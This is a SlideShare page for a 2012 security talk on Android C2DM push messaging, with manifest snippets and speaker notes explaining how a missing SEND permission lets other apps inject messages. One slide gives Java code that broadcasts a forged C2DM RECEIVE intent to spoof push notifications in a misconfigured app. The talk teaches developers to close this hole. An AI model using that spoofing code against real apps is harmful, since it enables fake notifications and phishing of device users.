SlideShare a Scribd company logo

AC2DM For Security

Download as PPTX, PDF
Jason Ross
Jason Ross

Talks about Google's Cloud to Device (C2D at the time this was written in 2012 - now known as Google Cloud Messaging) technology, and ways it can be misconfigured.

Technology
1 of 16
AC2DM for Security
Android C2DM Overview • Push notification for Android • Rides on Gtalk (XMPP) • Messages limited to 1024 bytes • Account limited to 200,000 messages per day
A confusing process Image taken from http://developer.cisco.com/web/cius-developer/blogroll/-/blogs/android-s-c2dm
Client Registration
App Registration
Message Send
Parts of a Message Required • Registration ID – sent by client • Collapse key – used to avoid flooding • Auth token – header from client login auth Optional • Data - payload • Delay while idle - flag
Manifest Components <permission android:name="com.intrepidusgroup.c2dm.permission.C2D_MESSAGE“ android:protectionLevel="signature" /> <!– Required to receive C2D messages --> <uses-permission android:name="com.intrepidusgroup.c2dm.permission.C2D_MESSAGE" /> <!– Required to register and receive registration results --> <uses-permission android:name="com.google.android.c2dm.permission.RECEIVE" /> <!– Internet required  <uses-permission android:name="android.permission.INTERNET" /> <application> <!-- Android C2DM registration receiver --> <receiver android:name=".c2dRegReceiver“ android:permission="com.google.android.c2dm.permission.SEND" > <intent-filter > <action android:name="com.google.android.c2dm.intent.REGISTRATION" ></action> <category android:name="com.intrepidusgroup.c2dm" /> </intent-filter> </receiver> <!-- Android C2DM message receiver --> <receiver android:name=".c2dMsgReceiver“ android:permission="com.google.android.c2dm.permission.SEND" > <intent-filter > <action android:name="com.google.android.c2dm.intent.RECEIVE" ></action> <category android:name="com.intrepidusgroup.c2dm" /> </intent-filter> </receiver> </application>
Real World <permission android:name="com.app.mobile.permission.C2D_MESSAGE" android:protectionLevel="signature" /> <uses-permission android:name="com.app.mobile.permission.C2D_MESSAGE" /> So far so good…
Real World <receiver android:name=".notifications.PushMsgReceiver" android:process=":notifications"> <intent-filter> <action android:name="com.google.android.c2dm.intent.RECEIVE" /> <category android:name="com.ebay.mobile" /> </intent-filter> <intent-filter> <action android:name="com.google.android.c2dm.intent.REGISTRATION" /> <category android:name="com.ebay.mobile" /> </intent-filter> </receiver> <!-- Only C2DM servers can send messages for the app. If permission is not set - any other app can generate it --> <receiver android:name=".C2DMReceiver" android:permission="com.google.android.c2dm.permission.SEND">
So… ZOMG!!
Example Push (seen in logcat) I/PushService( 3990): onHandleIntent: action=3, intent data=Bundle[{ itm=37524594341, push_action=3, title=message received from: jross, collapse_key=jrossig01, sound=m2mmsghdr.caf, evt=M2MMSGHDR, from=appid@gmail.com, usr=jross }]
Spoof (no cloud required) // declare the Intent final Intent sendC2DM = new Intent ("com.google.android.c2dm.intent.RECEIVE"); // set this as category com.app.mobile to match the intent-filter sendC2DM.addCategory("com.app.mobile"); // add the expected data elements sendC2DM.putExtra("itm", "37524594341"); sendC2DM.putExtra("push_action", "3"); sendC2DM.putExtra("title", "message recieved from: C2DSpoofer"); sendC2DM.putExtra("sound", "m2mmsghdr.caf"); sendC2DM.putExtra("evt", "M2MMSGHDR"); sendC2DM.putExtra("usr", send2usr); String collapse_key = randString.genString(rng, chars, 4); sendC2DM.putExtra("collapse_key", collapse_key); // send the message to the on-device push notification receiver sendBroadcast(sendC2DM);
What Happened? • App received a “C2D” message from another application installed on the device. • Because the permission wasn’t set correctly, it accepted the message as though it came from Google. • App displayed message notification, with the “malicious” payload intact.
Other Things We’ve Noticed • Messages that come in may not be accurately received by the activity they are sent to (see: demo). • If you have multiple devices, or multiple users on a single device, things may get tricky.
Questions? Contact: jason.ross@intrepidusgroup.com

Recommended

BP measurement
BP measurementBP measurement
BP measurementSikkim Manipal Institute Of Technology
 
Manual zanussi cocina zcv550 g1xa
Manual zanussi cocina zcv550 g1xaManual zanussi cocina zcv550 g1xa
Manual zanussi cocina zcv550 g1xaAlsako Electrodomésticos
 
Nodejs Security
Nodejs SecurityNodejs Security
Nodejs SecurityJason Ross
 
mtzk.cv.sg
mtzk.cv.sgmtzk.cv.sg
mtzk.cv.sgmay Ko
 
Sai resume updated
Sai resume updatedSai resume updated
Sai resume updatedsaikrishna. matcha
 
Diari del 04 de setembre del 2015
Diari del 04 de setembre del 2015Diari del 04 de setembre del 2015
Diari del 04 de setembre del 2015diarimes
 
Forrest Suehs Resume 2016 - Prof Advan Rev 0
Forrest Suehs Resume 2016 - Prof Advan Rev 0Forrest Suehs Resume 2016 - Prof Advan Rev 0
Forrest Suehs Resume 2016 - Prof Advan Rev 0Forrest Suehs
 
Moving from Social Technology towards an Operating System for the Organisation
Moving from Social Technology towards an Operating System for the OrganisationMoving from Social Technology towards an Operating System for the Organisation
Moving from Social Technology towards an Operating System for the OrganisationLee Bryant
 

Recommended

BP measurement
BP measurementBP measurement
BP measurementSikkim Manipal Institute Of Technology
 
Manual zanussi cocina zcv550 g1xa
Manual zanussi cocina zcv550 g1xaManual zanussi cocina zcv550 g1xa
Manual zanussi cocina zcv550 g1xaAlsako Electrodomésticos
 
Nodejs Security
Nodejs SecurityNodejs Security
Nodejs SecurityJason Ross
 
mtzk.cv.sg
mtzk.cv.sgmtzk.cv.sg
mtzk.cv.sgmay Ko
 
Sai resume updated
Sai resume updatedSai resume updated
Sai resume updatedsaikrishna. matcha
 
Diari del 04 de setembre del 2015
Diari del 04 de setembre del 2015Diari del 04 de setembre del 2015
Diari del 04 de setembre del 2015diarimes
 
Forrest Suehs Resume 2016 - Prof Advan Rev 0
Forrest Suehs Resume 2016 - Prof Advan Rev 0Forrest Suehs Resume 2016 - Prof Advan Rev 0
Forrest Suehs Resume 2016 - Prof Advan Rev 0Forrest Suehs
 
Moving from Social Technology towards an Operating System for the Organisation
Moving from Social Technology towards an Operating System for the OrganisationMoving from Social Technology towards an Operating System for the Organisation
Moving from Social Technology towards an Operating System for the OrganisationLee Bryant
 
FOSS STHLM Android Cloud to Device Messaging
FOSS STHLM Android Cloud to Device MessagingFOSS STHLM Android Cloud to Device Messaging
FOSS STHLM Android Cloud to Device MessagingJohan Nilsson
 
Android Cloud to Device Messaging Framework at GTUG Stockholm
Android Cloud to Device Messaging Framework at GTUG StockholmAndroid Cloud to Device Messaging Framework at GTUG Stockholm
Android Cloud to Device Messaging Framework at GTUG StockholmJohan Nilsson
 
Android Cloud To Device Messaging
Android Cloud To Device MessagingAndroid Cloud To Device Messaging
Android Cloud To Device MessagingFernando Cejas
 
Android cloud to device messaging
Android cloud to device messagingAndroid cloud to device messaging
Android cloud to device messagingFe
 
GCM aperitivo Android
GCM aperitivo AndroidGCM aperitivo Android
GCM aperitivo AndroidLuca Morettoni
 
Workshop: Android
Workshop: AndroidWorkshop: Android
Workshop: AndroidBarcelona Digital Technology Centre
 
GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능
GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능
GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능GDG Korea
 
Gcm presentation
Gcm presentationGcm presentation
Gcm presentationNiraj Singh
 
Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...
Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...
Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...99X Technology
 
Android securitybyexample
Android securitybyexampleAndroid securitybyexample
Android securitybyexamplePragati Rai
 
Максим Щеглов - Google Cloud Messaging for Android
Максим Щеглов - Google Cloud Messaging for AndroidМаксим Щеглов - Google Cloud Messaging for Android
Максим Щеглов - Google Cloud Messaging for AndroidUA Mobile
 
Google Cloud Messaging
Google Cloud MessagingGoogle Cloud Messaging
Google Cloud MessagingAshiq Uz Zoha
 
What's new in android jakarta gdg (2015-08-26)
What's new in android jakarta gdg (2015-08-26)What's new in android jakarta gdg (2015-08-26)
What's new in android jakarta gdg (2015-08-26)Google
 
Push Notification in IBM MobileFirst Xamarin SDK
Push Notification in IBM MobileFirst Xamarin SDKPush Notification in IBM MobileFirst Xamarin SDK
Push Notification in IBM MobileFirst Xamarin SDKAjay Chebbi
 
Magda badita gcm
Magda badita gcmMagda badita gcm
Magda badita gcmGoogle Developer Group Bucharest
 
android level 3
android level 3android level 3
android level 3DevMix
 
testupload
testuploadtestupload
testuploadadmiralderp
 
Android Froyo
Android FroyoAndroid Froyo
Android FroyoRobert Cooper
 
Android push-applications-android
Android push-applications-androidAndroid push-applications-android
Android push-applications-androidwadise
 
Android chat in the cloud
Android chat in the cloudAndroid chat in the cloud
Android chat in the cloudfirenze-gtug
 
Tizen Security
Tizen SecurityTizen Security
Tizen SecurityJason Ross
 
Android malware analysis
Android malware analysisAndroid malware analysis
Android malware analysisJason Ross
 

More Related Content

Similar to AC2DM For Security

FOSS STHLM Android Cloud to Device Messaging
FOSS STHLM Android Cloud to Device MessagingFOSS STHLM Android Cloud to Device Messaging
FOSS STHLM Android Cloud to Device MessagingJohan Nilsson
 
Android Cloud to Device Messaging Framework at GTUG Stockholm
Android Cloud to Device Messaging Framework at GTUG StockholmAndroid Cloud to Device Messaging Framework at GTUG Stockholm
Android Cloud to Device Messaging Framework at GTUG StockholmJohan Nilsson
 
Android Cloud To Device Messaging
Android Cloud To Device MessagingAndroid Cloud To Device Messaging
Android Cloud To Device MessagingFernando Cejas
 
Android cloud to device messaging
Android cloud to device messagingAndroid cloud to device messaging
Android cloud to device messagingFe
 
GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능
GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능
GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능GDG Korea
 
Gcm presentation
Gcm presentationGcm presentation
Gcm presentationNiraj Singh
 
Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...
Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...
Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...99X Technology
 
Android securitybyexample
Android securitybyexampleAndroid securitybyexample
Android securitybyexamplePragati Rai
 
Максим Щеглов - Google Cloud Messaging for Android
Максим Щеглов - Google Cloud Messaging for AndroidМаксим Щеглов - Google Cloud Messaging for Android
Максим Щеглов - Google Cloud Messaging for AndroidUA Mobile
 
Google Cloud Messaging
Google Cloud MessagingGoogle Cloud Messaging
Google Cloud MessagingAshiq Uz Zoha
 
What's new in android jakarta gdg (2015-08-26)
What's new in android jakarta gdg (2015-08-26)What's new in android jakarta gdg (2015-08-26)
What's new in android jakarta gdg (2015-08-26)Google
 
Push Notification in IBM MobileFirst Xamarin SDK
Push Notification in IBM MobileFirst Xamarin SDKPush Notification in IBM MobileFirst Xamarin SDK
Push Notification in IBM MobileFirst Xamarin SDKAjay Chebbi
 
android level 3
android level 3android level 3
android level 3DevMix
 
Android push-applications-android
Android push-applications-androidAndroid push-applications-android
Android push-applications-androidwadise
 
Android chat in the cloud
Android chat in the cloudAndroid chat in the cloud
Android chat in the cloudfirenze-gtug
 

Similar to AC2DM For Security (20)

FOSS STHLM Android Cloud to Device Messaging
FOSS STHLM Android Cloud to Device MessagingFOSS STHLM Android Cloud to Device Messaging
FOSS STHLM Android Cloud to Device Messaging
 
Android Cloud to Device Messaging Framework at GTUG Stockholm
Android Cloud to Device Messaging Framework at GTUG StockholmAndroid Cloud to Device Messaging Framework at GTUG Stockholm
Android Cloud to Device Messaging Framework at GTUG Stockholm
 
Android Cloud To Device Messaging
Android Cloud To Device MessagingAndroid Cloud To Device Messaging
Android Cloud To Device Messaging
 
Android cloud to device messaging
Android cloud to device messagingAndroid cloud to device messaging
Android cloud to device messaging
 
GCM aperitivo Android
GCM aperitivo AndroidGCM aperitivo Android
GCM aperitivo Android
 
Workshop: Android
Workshop: AndroidWorkshop: Android
Workshop: Android
 
GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능
GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능
GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능
 
Gcm presentation
Gcm presentationGcm presentation
Gcm presentation
 
Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...
Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...
Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...
 
Android securitybyexample
Android securitybyexampleAndroid securitybyexample
Android securitybyexample
 
Максим Щеглов - Google Cloud Messaging for Android
Максим Щеглов - Google Cloud Messaging for AndroidМаксим Щеглов - Google Cloud Messaging for Android
Максим Щеглов - Google Cloud Messaging for Android
 
Google Cloud Messaging
Google Cloud MessagingGoogle Cloud Messaging
Google Cloud Messaging
 
What's new in android jakarta gdg (2015-08-26)
What's new in android jakarta gdg (2015-08-26)What's new in android jakarta gdg (2015-08-26)
What's new in android jakarta gdg (2015-08-26)
 
Push Notification in IBM MobileFirst Xamarin SDK
Push Notification in IBM MobileFirst Xamarin SDKPush Notification in IBM MobileFirst Xamarin SDK
Push Notification in IBM MobileFirst Xamarin SDK
 
Magda badita gcm
Magda badita gcmMagda badita gcm
Magda badita gcm
 
android level 3
android level 3android level 3
android level 3
 
testupload
testuploadtestupload
testupload
 
Android Froyo
Android FroyoAndroid Froyo
Android Froyo
 
Android push-applications-android
Android push-applications-androidAndroid push-applications-android
Android push-applications-android
 
Android chat in the cloud
Android chat in the cloudAndroid chat in the cloud
Android chat in the cloud
 

More from Jason Ross

Tizen Security
Tizen SecurityTizen Security
Tizen SecurityJason Ross
 
Android malware analysis
Android malware analysisAndroid malware analysis
Android malware analysisJason Ross
 
Alice and Bob are Eff'd
Alice and Bob are Eff'dAlice and Bob are Eff'd
Alice and Bob are Eff'dJason Ross
 
WHOIS the Master
WHOIS the MasterWHOIS the Master
WHOIS the MasterJason Ross
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The EnterpriseJason Ross
 
Dev opsec killing-the_buzz
Dev opsec killing-the_buzzDev opsec killing-the_buzz
Dev opsec killing-the_buzzJason Ross
 

More from Jason Ross (6)

Tizen Security
Tizen SecurityTizen Security
Tizen Security
 
Android malware analysis
Android malware analysisAndroid malware analysis
Android malware analysis
 
Alice and Bob are Eff'd
Alice and Bob are Eff'dAlice and Bob are Eff'd
Alice and Bob are Eff'd
 
WHOIS the Master
WHOIS the MasterWHOIS the Master
WHOIS the Master
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
 
Dev opsec killing-the_buzz
Dev opsec killing-the_buzzDev opsec killing-the_buzz
Dev opsec killing-the_buzz
 

Recently uploaded

WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 

Recently uploaded (20)

WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 

AC2DM For Security

  • 2. Android C2DM Overview • Push notification for Android • Rides on Gtalk (XMPP) • Messages limited to 1024 bytes • Account limited to 200,000 messages per day
  • 3. A confusing process Image taken from http://developer.cisco.com/web/cius-developer/blogroll/-/blogs/android-s-c2dm
  • 7. Parts of a Message Required • Registration ID – sent by client • Collapse key – used to avoid flooding • Auth token – header from client login auth Optional • Data - payload • Delay while idle - flag
  • 8. Manifest Components <permission android:name="com.intrepidusgroup.c2dm.permission.C2D_MESSAGE“ android:protectionLevel="signature" /> <!– Required to receive C2D messages --> <uses-permission android:name="com.intrepidusgroup.c2dm.permission.C2D_MESSAGE" /> <!– Required to register and receive registration results --> <uses-permission android:name="com.google.android.c2dm.permission.RECEIVE" /> <!– Internet required  <uses-permission android:name="android.permission.INTERNET" /> <application> <!-- Android C2DM registration receiver --> <receiver android:name=".c2dRegReceiver“ android:permission="com.google.android.c2dm.permission.SEND" > <intent-filter > <action android:name="com.google.android.c2dm.intent.REGISTRATION" ></action> <category android:name="com.intrepidusgroup.c2dm" /> </intent-filter> </receiver> <!-- Android C2DM message receiver --> <receiver android:name=".c2dMsgReceiver“ android:permission="com.google.android.c2dm.permission.SEND" > <intent-filter > <action android:name="com.google.android.c2dm.intent.RECEIVE" ></action> <category android:name="com.intrepidusgroup.c2dm" /> </intent-filter> </receiver> </application>
  • 10. Real World <receiver android:name=".notifications.PushMsgReceiver" android:process=":notifications"> <intent-filter> <action android:name="com.google.android.c2dm.intent.RECEIVE" /> <category android:name="com.ebay.mobile" /> </intent-filter> <intent-filter> <action android:name="com.google.android.c2dm.intent.REGISTRATION" /> <category android:name="com.ebay.mobile" /> </intent-filter> </receiver> <!-- Only C2DM servers can send messages for the app. If permission is not set - any other app can generate it --> <receiver android:name=".C2DMReceiver" android:permission="com.google.android.c2dm.permission.SEND">
  • 12. Example Push (seen in logcat) I/PushService( 3990): onHandleIntent: action=3, intent data=Bundle[{ itm=37524594341, push_action=3, title=message received from: jross, collapse_key=jrossig01, sound=m2mmsghdr.caf, evt=M2MMSGHDR, from=appid@gmail.com, usr=jross }]
  • 13. Spoof (no cloud required) // declare the Intent final Intent sendC2DM = new Intent ("com.google.android.c2dm.intent.RECEIVE"); // set this as category com.app.mobile to match the intent-filter sendC2DM.addCategory("com.app.mobile"); // add the expected data elements sendC2DM.putExtra("itm", "37524594341"); sendC2DM.putExtra("push_action", "3"); sendC2DM.putExtra("title", "message recieved from: C2DSpoofer"); sendC2DM.putExtra("sound", "m2mmsghdr.caf"); sendC2DM.putExtra("evt", "M2MMSGHDR"); sendC2DM.putExtra("usr", send2usr); String collapse_key = randString.genString(rng, chars, 4); sendC2DM.putExtra("collapse_key", collapse_key); // send the message to the on-device push notification receiver sendBroadcast(sendC2DM);
  • 14. What Happened? • App received a “C2D” message from another application installed on the device. • Because the permission wasn’t set correctly, it accepted the message as though it came from Google. • App displayed message notification, with the “malicious” payload intact.
  • 15. Other Things We’ve Noticed • Messages that come in may not be accurately received by the activity they are sent to (see: demo). • If you have multiple devices, or multiple users on a single device, things may get tricky.

Editor's Notes

  1. registration_id = The registration ID retrieved from the Android application on the phone. Required. collapse_key = An arbitrary string that is used to collapse a group of like messages when the device is offline, so that only the last message gets sent to the client. This is intended to avoid sending too many messages to the phone when it comes back online. Note that since there is no guarantee of the order in which messages get sent, the "last" message may not actually be the last message sent by the application server. Required. data.<key>= Payload data, expressed as key-value pairs. If present, it will be included in the Intent as application data, with the <key>. There is no limit on the number of key/value pairs, though there is a limit on the total size of the message. Optional. delay_while_idle = If included, indicates that the message should not be sent immediately if the device is idle. The server will wait for the device to become active, and then only the last message for each collapse_key value will be sent. Optional. Authorization = GoogleLogin auth=[AUTH_TOKEN]Header with a ClientLogin Auth token. The cookie must be associated with the ac2dm service. Required.
  2. This requires the application signature be present when the permission is used This restrict the C2D messages such that they must be sourced from Google in order for the application to process them. If the “android:permission” portion is missing, anyone can push messages of this type (Registration results) to the application. Same as #2, but for the actual C2D messages